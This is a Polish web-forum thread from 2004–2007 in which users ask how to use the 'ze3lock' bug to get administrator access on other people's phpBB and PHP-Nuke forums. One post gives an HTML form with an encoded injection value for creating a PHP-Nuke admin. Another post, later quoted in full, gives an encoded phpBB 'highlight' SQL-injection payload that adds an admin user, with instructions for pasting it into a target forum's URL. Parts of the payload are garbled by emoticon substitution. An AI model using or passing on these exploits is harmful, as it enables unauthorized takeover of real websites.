bug w php - "ze3lock"

Lemona · Grudzień 15, 2004

http://strefaphp.net/index.php?page=news&a...view&id=103

może mi ktoś napisać, jak zrobić ze3locka na np. jakims.forum.pl ?????
męcze sie i męcze, a ni ma

Rob · Grudzień 15, 2004

bo pewnie trzeba jakies zmienne napisac inaczej.....widze ze jest tam zmienna user_id i jej wartosc wynosci 99999 - wedlug mnie nie mozesz sobie tak na forum wpasc i dodac nagle usera z numerem 99999 jesli na tym forum jest np. 5555 userow

Pepi · Styczeń 17, 2005

Chcesz Admina na forach :twisted:
Zapoznaj sie z Exploitami na strony robione w phpnuke.

Zanim popracujesz na pierwszym to poczytaj info
http://www.rzw.com.ar/article895.html
Jest tu tez inny sposób na Admina.
Jak juz sobie poczytasz to pouzywaj tego Exploita.
http://www.hackgeneral.net/exploit.php

Drugi sposób to

Kod:

<meta name="generator" content="Namo WebEditor v5.0"> 

<form name="mantra" method="POST" action="[Adres strony w php]/admin.php"> 

  

USERNAME: 

    <input type="text" name="add_aid"> 

    NOME: 

    <input type="text" name="add_name"> 

    PASSWORD: 

    <input type="text" name="add_pwd"> 

    E-MAIL: 

    <input type="text" name="add_email"> 

    <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 

    <input type="hidden" name="add_radminsuper" value="1"> 

    <input type="hidden" name="op" value="AddAuthor"> 

  </p> 

  

 

    <input type="submit" name="Submit" value="Create Admin"> 

   </p> 

</form>

Zapisz to do pliku html i odpal.
POtem szybko uzupełnij i jak trafisz to masz szczęscie jak w multilotku.
See ya

DJBOSS666 · Styczeń 18, 2005

Rob jestes w bledzie !

mozesz sobie stworzyc urzytkownika o numerze 99999! Bug dziala na phpbb 2.0.10 i mniejsze

Zadnych zmiennych nie trzeba pisac inaczej

Trzeba poprostu troszku pomyslec

. Jezeli nie wpadniesz na to, to sie nie mecz z tym bo to nie ma sesu

Pozdrawiam

DJBOSS666

Rob · Styczeń 18, 2005

Originally posted by DJBOSS666
Trzeba poprostu troszku pomyslec

. Jezeli nie wpadniesz na to, to sie nie mecz z tym bo to nie ma sesu

Takie odpowiedzi sa najlepsze ;]

Plik · Styczeń 18, 2005

hm niom Rob jest w bledzie [DJBOSS666

- security tim lol]
nie mowcie jak to zrobic bo moze to byc niebezpieczne w rekach niepowolanych osob.
wiec jak ktos wie o co chcodzi to zrobi to sam.
pozdrawiam.

Rob · Styczeń 18, 2005

ok, skoro juz przy phpbb jestesmy to mam pytanie czy cookies tworzone przez phpbb da sie rozkodowac w base64 czy jakos inaczej ?

Rob · Styczeń 23, 2005

no coz, myslalem ze panowie ktorzy wiedza co jak sie dodaje uzytkownika ze3lock beda umieli mi podpowiedziec ze chodzilo o urlencode a nie o base 64, a tu kilka dni minelo i cisza ;p

wiec pytanie drugie; czy istnieje cos na wzor dekodera base64 jaki jest na hacking.pl, tyle ze dekodujacego urlencode (czyli urldecode) ? poki co nic takiego nie znalazlem i wyglada na to ze bede musial skorzystac z przykladowych skryptow php i jakos sam cos takiego sobie zrobic...

Marcel Gąsior · Wrzesień 1, 2007

Kod:

highlight=%2527%252emysql_query(chr(73)%252echr(7Cool%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(7Cool%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(9Cool%252echr(9Cool%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%252echr(9Cool%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(9Cool%252echr(100)%252echr(100)%252echr(102)%252echr(55)%252echr(9Cool%252echr(51)%252echr(54)%252echr(56)%252echr(9Cool%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(4Cool%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(4Cool%252echr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527

Wklejasz ten kod w temacie na forum, które chcesz shackować (np. www.jakiesforum.pl/forum/viewtopic.php?t=1xxx gdzie "xxx" to ten kod doklejony przez nas) i klikasz enter lub odśwież, by strona się wgrała i jeśli forum nie ma załatanej dziury, to w bazę danych wskakuje użytkownik z uprawnieniami admina o nazwie "ze3lock" i haśle "thepass". Proste, nie? :glupek2:

PP :faja:

abramakabra · Wrzesień 1, 2007

Originally posted by Marcel Gąsior

Kod:

highlight=%2527%252emysql_query(chr(73)%252echr(7Cool%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(7Cool%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(9Cool%252echr(9Cool%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%252echr(9Cool%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(9Cool%252echr(100)%252echr(100)%252echr(102)%252echr(55)%252echr(9Cool%252echr(51)%252echr(54)%252echr(56)%252echr(9Cool%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(4Cool%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(4Cool%252echr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527

Wklejasz ten kod w temacie na forum, które chcesz shackować (np. www.jakiesforum.pl/forum/viewtopic.php?t=1xxx gdzie "xxx" to ten kod doklejony przez nas) i klikasz enter lub odśwież, by strona się wgrała i jeśli forum nie ma załatanej dziury, to w bazę danych wskakuje użytkownik z uprawnieniami admina o nazwie "ze3lock" i haśle "thepass". Proste, nie? :glupek2: PP :faja:

Brawo, brawo 3 lata czekałem na tą odpowiedź :-D

Marcel Gąsior · Wrzesień 1, 2007

Lepiej późno niż wcale

bug w php - "ze3lock"

Lemona

Użytkownik

Rob

Użytkownik

Pepi

Użytkownik

DJBOSS666

Użytkownik

Rob

Użytkownik

Plik

Użytkownik

Rob

Użytkownik

Rob

Użytkownik

Marcel Gąsior

Użytkownik

abramakabra

Były Moderator

Marcel Gąsior

Użytkownik